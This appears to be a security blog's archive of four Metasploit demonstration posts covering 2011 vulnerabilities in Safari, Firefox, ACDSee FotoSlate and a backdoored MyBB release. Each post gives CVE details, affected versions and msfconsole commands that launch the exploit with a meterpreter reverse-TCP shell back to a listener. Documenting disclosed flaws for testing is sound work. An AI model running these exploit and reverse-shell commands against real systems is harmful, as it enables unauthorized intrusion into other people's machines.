Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2011-3230 Apple Safari file:// Arbitrary Code Execution Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered and reported to vendor by Aaron Sigel
Coordinated release of the vulnerability the 2011-10-12
Metasploit PoC provided the 2011-10-16

PoC provided by :

Aaron Sigel
sinn3r

Reference(s) :

CVE-2011-3230
HT5000

Affected version(s) :

Safari 5.1 for Mac OS X v10.6.8
Safari 5.1 for Mac OS X Server v10.6.8
Safari 5.1 for OS X Lion v10.7.2
Safari 5.1 for OS X Lion Server v10.7.2

Tested on Mac OS X 10.7.1 with :

Safari 5.1 (7524.48.3) and Java SE Runtime Environment (build 1.6.0_26-b03-383-11A511)

Description :

This module exploits a vulnerability found in Apple Safari on OSX platform. A policy issue in the handling of file:// URLs may allow arbitrary remote code execution under the context of the user. In order to trigger arbitrary remote code execution, the best way seems to be opening a share on the victim machine first (this can be SMB/WebDav/FTP, or a fileformat that OSX might automount), and then execute it in /Volumes/[share]. If there’s some kind of bug that leaks the victim machine’s current username, then it’s also possible to execute the payload in /Users/[username]/Downloads/, or else bruteforce your way to getting that information. Please note that non-java payloads (*.sh extension) might get launched by Xcode instead of executing it, in that case please try the Java ones instead.

Commands :

use exploit/osx/browser/safari_file_policy
set SRVHOST 192.168.178.21
set URIPATH /readme.html
set TARGET 1
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

CVE-2011-2371 Mozilla Firefox Array.reduceRight() Integer Overflow Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered and reported to vendor by Chris Rohlf & Yan Ivnitskiy the 2011-06-13
Public release of the vulnerability the 2011-06-21
Metasploit PoC provided the 2011-10-12

PoC provided by :

Chris Rohlf
Yan Ivnitskiy
Matteo Memelli
dookie2000ca
sinn3r

Reference(s) :

CVE-2011-2371
EDB-ID-17974
MFSA-2011-22

Affected version(s) :

Mozilla Firefox versions before 3.6.18
Mozilla Firefox versions before 4.0.1
Thunderbird versions before 3.1.11
SeaMonkey versions before 2.2

Tested on Windows XP SP3 with :

Mozilla Firefox 3.6.16

Description :

This module exploits a vulnerability found in Mozilla Firefox 3.6. When an array object is configured with a large length value, the reduceRight() method may cause an invalid index being used, allowing abitrary remote code execution. Please note that the exploit requires a longer amount of time (compare to a typical browser exploit) in order to gain control of the machine.

Commands :

use exploit/windows/browser/mozilla_reduceright
set LHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

CVE-2011-2595 ACDSee FotoSlate PLP File id Parameter Overflow Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered by Parvez Anwar
Public release of the vulnerability the 2011-09-12
Metasploit PoC provided the 2011-10-10

PoC provided by :

Parvez Anwar
juan vazquez

Reference(s) :

CVE-2011-2595
OSVDB-75425

Affected version(s) :

ACDSee FotoSlate 4.0 Build 146 is vulnerable, other versions may also be affected.

Tested on Windows XP SP3 with :

ACDSee FotoSlate 4.0 Build 146

Description :

This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via a specially crafted id parameter in a String element. When viewing a malicious PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a buffer and execute arbitrary code. This exploit has been tested on systems such as Windows XP SP3, Windows Vista, and Windows 7.

Commands :

use exploit/windows/fileformat/acdsee_fotoslate_string
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
exploit -j

getuid
sysinfo

MyBB 1.6.4 Backdoor Metasploit Demo

Exploits, Metasploit

Timeline :

Vulnerability discovered by the vendor the 2011-10-06
Public release of the vulnerability the 2011-10-06
Metasploit PoC provided the 2011-10-08

PoC provided by :

tdz

Reference(s) :

SA46300

Affected version(s) :

MyBB 1.6.4 prior to October 6th, 2011 are vulnerable.

Tested on Ubuntu 10.04.3 LTS with :

MyBB 1.6.4

Description :

myBB is a popular open source PHP forum software. Version 1.6.4 contained an unauthorized backdoor, distributed as part of the vendor’s source package.

Commands :

use exploit/unix/webapp/mybb_backdoor
set RHOST 192.168.178.21
set VHOST blackbox.zataz.loc
set URI /mybb/index.php
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo